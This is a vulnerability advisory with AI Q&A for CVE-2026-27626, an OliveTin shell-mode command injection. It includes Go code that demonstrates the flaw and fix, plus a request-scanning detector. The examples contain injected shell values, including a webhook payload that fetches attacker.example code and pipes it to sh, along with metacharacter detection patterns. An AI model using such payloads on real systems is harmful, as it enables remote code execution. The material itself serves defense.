CVE-2026-27626
Unauthenticated Remote Code Execution in OliveTin Shell Mode
Publication date: 2026-02-25
Last updated on: 2026-02-27
Assigner: GitHub, Inc.
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| olivetin | olivetin | up to and including 3000.10.0 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-27626 is a critical OS command injection vulnerability in OliveTin versions up to and including 3000.10.0. OliveTin exposes predefined shell commands through a web interface. The flaw is that the shell-mode safety check rejects shell metacharacters for most argument types but exempts the 'password' type, so a password-typed value can carry metacharacters that the shell then interprets as additional commands rather than as data.

There are two independent attack vectors. Vector 1: any authenticated user can supply a malicious 'password' argument containing shell metacharacters, and the shell executes them. Vector 2: an unauthenticated attacker can send specially crafted JSON to webhook endpoints, bypassing the type safety checks and reaching the same command execution path. Combined, these give unauthenticated remote code execution on OliveTin instances that use Shell mode with webhook-triggered actions. [1]
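The pattern described above, as an added example in Go (OliveTin's implementation language) that is not OliveTin's own code: a simplified shell-mode argument check that exempts the password type, the same template rendered with the check applied to every type, and the structural alternative of passing each value as its own argv element so no shell parses it. The argument type names ("ascii", "password"), the {{ name }} template syntax and the malicious value are assumptions constructed for the example.

```go
package main

import (
	"fmt"
	"os/exec"
	"regexp"
	"strings"
)

// Argument is one action argument as submitted by a user or a webhook.
// Type mirrors an argument "type" field; the type names used here are assumed.
type Argument struct {
	Name, Type, Value string
}

// metachars matches characters that change the meaning of a string once a
// shell parses it: separators, pipes, substitutions, quotes, redirects, newlines.
var metachars = regexp.MustCompile("[;&|`$(){}<>\\\\\"'\n]")

// checkArgVulnerable models the class of bug in the advisory: the check runs
// for every type except "password", so a password value reaches the shell
// unexamined.
func checkArgVulnerable(a Argument) error {
	if a.Type == "password" { // the exemption that makes Vector 1 possible
		return nil
	}
	return rejectMetachars(a)
}

// checkArgFixed applies the same rule to every type, including password.
func checkArgFixed(a Argument) error {
	return rejectMetachars(a)
}

func rejectMetachars(a Argument) error {
	if metachars.MatchString(a.Value) {
		return fmt.Errorf("argument %q contains shell metacharacters", a.Name)
	}
	return nil
}

// renderShell substitutes {{ name }} placeholders into a shell template and
// returns the string that would be handed to "sh -c". This is the dangerous
// step: whatever survives check() becomes shell syntax, not data.
func renderShell(tmpl string, args []Argument, check func(Argument) error) (string, error) {
	cmd := tmpl
	for _, a := range args {
		if err := check(a); err != nil {
			return "", err
		}
		cmd = strings.ReplaceAll(cmd, "{{ "+a.Name+" }}", a.Value)
	}
	return cmd, nil
}

// buildExecArgv is the structural fix: the template is already split into
// argv tokens and a value replaces a placeholder token as a single element.
// The result goes to exec.Command(argv[0], argv[1:]...), so no shell ever
// parses the value and metacharacters stay inert.
func buildExecArgv(tokens []string, args []Argument) []string {
	argv := make([]string, len(tokens))
	for i, tok := range tokens {
		argv[i] = tok
		for _, a := range args {
			if tok == "{{ "+a.Name+" }}" {
				argv[i] = a.Value
			}
		}
	}
	return argv
}

func main() {
	args := []Argument{
		{Name: "user", Type: "ascii", Value: "deploy"},
		// Constructed malicious value: closes the quote, runs a second
		// command, then reopens the quote so the template still parses.
		{Name: "pw", Type: "password", Value: "x'; id > /tmp/pwned; echo '"},
	}
	tmpl := "mysql -u {{ user }} -p'{{ pw }}' -e 'SHOW DATABASES'"

	cmd, err := renderShell(tmpl, args, checkArgVulnerable)
	fmt.Printf("vulnerable check passed; sh -c would receive:\n  %s\n  err=%v\n", cmd, err)

	_, err = renderShell(tmpl, args, checkArgFixed)
	fmt.Printf("fixed check: err=%v\n", err)

	argv := buildExecArgv([]string{"mysql", "-u", "{{ user }}", "-p", "{{ pw }}", "-e", "SHOW DATABASES"}, args)
	c := exec.Command(argv[0], argv[1:]...) // not run here; shown for the argv shape
	fmt.Printf("exec argv (password is one element, never parsed by a shell): %q\n", c.Args)
}
```

The check-every-type fix closes the specific gap; the argv form removes the shell from the path entirely, which is the only fix that also survives new argument types being added later.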
How can this vulnerability impact me?
This vulnerability allows attackers to execute arbitrary operating system commands on the OliveTin host with the permissions of the OliveTin process.
- Authenticated users can exploit Vector 1 to run arbitrary commands by injecting malicious input in password-typed arguments.
- Unauthenticated attackers can exploit Vector 2 by sending malicious JSON payloads to webhook endpoints, leading to remote code execution without any authentication.
The combined effect is unauthenticated remote code execution, which can compromise the confidentiality, integrity, and availability of the affected system.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection rests on spotting shell metacharacters where only plain data should appear: in password-typed arguments sent to the action API, and in the JSON bodies of webhook requests.

For Vector 1 (authenticated user input), review OliveTin API logs for POST requests to /api/StartAction whose password arguments contain shell metacharacters such as ;, |, `, or $().

For Vector 2 (unauthenticated webhook), watch incoming POST requests to webhook endpoints (e.g., /webhook/git-deploy) for JSON payloads whose values contain the same characters.

Suggested commands to detect exploitation attempts include:
- Capture HTTP POST requests to /api/StartAction and /webhook/* with a network monitoring tool (e.g., tcpdump, Wireshark) and inspect the payloads for shell metacharacters. This only works where the traffic is not encrypted; if OliveTin sits behind a TLS-terminating reverse proxy, inspect the proxy's access logs or capture on its plaintext side instead.
- Search OliveTin's logs for command lines containing shell metacharacters, for example with grep (adjust the path to wherever the service's output is collected, such as journalctl or container logs). Expect legitimate actions that use pipes or quoting to match too, so compare hits against the configured actions:
- grep -E ';|\||`|\$\(' /path/to/olivetin/logs/*
- Check for unexpected shell processes spawned by OliveTin. ps aux | grep olivetin only lists processes whose command line mentions OliveTin, so also view the process tree (ps -eo pid,ppid,user,cmd --forest) and look for sh -c children of the OliveTin process running commands that no configured action would produce. [1]
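The detection logic above, as an added example in Go that is not part of this page or of OliveTin: it scans captured request records for the two endpoint families named in the answer and flags any JSON string value carrying shell metacharacters, walking the whole document so webhook payloads with unknown keys are covered as well as StartAction arguments. The request records, the StartAction body shape ({"actionId": ..., "arguments": [{"name": ..., "value": ...}]}) and the /webhook/git-deploy payload are constructed for the example and assumed, not taken from OliveTin logs.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
	"strings"
)

// RequestRecord is one captured HTTP request: URL path plus raw JSON body.
// This shape is constructed for the example, not an OliveTin log format.
type RequestRecord struct {
	Path string
	Body string
}

// Finding names the offending JSON field (as a dotted path) and its value.
type Finding struct {
	Path  string // request path
	Field string // JSON path of the suspicious string, e.g. $.arguments[0].value
	Value string
}

// metachars matches characters that become syntax once a shell parses the
// string: separators, pipes, substitutions, quotes, redirects, newlines.
var metachars = regexp.MustCompile("[;&|`$(){}<>\\\\\"'\n]")

// scan returns findings for one request. Only the action-start and webhook
// endpoints are examined; unparseable JSON sent to them is reported as well.
func scan(rec RequestRecord) []Finding {
	if !strings.HasPrefix(rec.Path, "/api/StartAction") && !strings.HasPrefix(rec.Path, "/webhook/") {
		return nil
	}
	var doc any
	if err := json.Unmarshal([]byte(rec.Body), &doc); err != nil {
		return []Finding{{rec.Path, "<body>", "unparseable JSON: " + err.Error()}}
	}
	var out []Finding
	walk(rec.Path, "$", doc, &out)
	return out
}

// walk visits every string leaf in the decoded document, so it does not
// depend on knowing the payload's keys in advance (webhooks vary by sender).
func walk(path, field string, v any, out *[]Finding) {
	switch t := v.(type) {
	case string:
		if metachars.MatchString(t) {
			*out = append(*out, Finding{path, field, t})
		}
	case []any:
		for i, e := range t {
			walk(path, fmt.Sprintf("%s[%d]", field, i), e, out)
		}
	case map[string]any:
		for k, e := range t {
			walk(path, field+"."+k, e, out)
		}
	}
}

// scanAll keeps record order so findings can be correlated with the capture.
func scanAll(recs []RequestRecord) []Finding {
	var out []Finding
	for _, r := range recs {
		out = append(out, scan(r)...)
	}
	return out
}

// sampleRequests are constructed: a benign action start, a Vector 1 style
// password argument, a Vector 2 style webhook payload, and an unrelated
// endpoint that must be ignored.
var sampleRequests = []RequestRecord{
	{"/api/StartAction", `{"actionId":"deploy","arguments":[{"name":"user","value":"deploy"}]}`},
	{"/api/StartAction", `{"actionId":"dbdump","arguments":[{"name":"pw","value":"x'; id > /tmp/o; echo '"}]}`},
	{"/webhook/git-deploy", `{"ref":"main","pusher":{"name":"$(curl attacker.example/x|sh)"}}`},
	{"/api/GetDashboardComponents", `{"filter":"; not an action start"}`},
}

func main() {
	for _, f := range scanAll(sampleRequests) {
		fmt.Printf("%-22s %-24s %q\n", f.Path, f.Field, f.Value)
	}
}
```

Run against real captures this will also flag legitimate values that happen to contain quotes or parentheses; treat it as a triage filter feeding the log and process-tree checks above rather than as a verdict on its own.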
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation consists of restricting access and disabling the vulnerable features until a patched release is in place.
- Restrict or disable webhook endpoints that accept unauthenticated POST requests, since they are the unauthenticated path (Vector 2) to remote code execution.
- Disable or restrict Shell mode in OliveTin, and in particular avoid password-typed arguments in shell-mode actions, since that is the type the safety check exempts.
- Enforce authentication and authorization on all API endpoints, especially /api/StartAction and the webhook endpoints. Note that authentication alone does not remove Vector 1, which is available to any authenticated user.
- Monitor and audit OliveTin logs for suspicious command executions or unusual activity.
- Consider network-level controls such as firewall rules to limit access to OliveTin services.
As of the publication date, no patched version is available, so these mitigations are critical to reduce risk. Check the upstream GitHub Security Advisory for a fixed release before treating the mitigations as sufficient.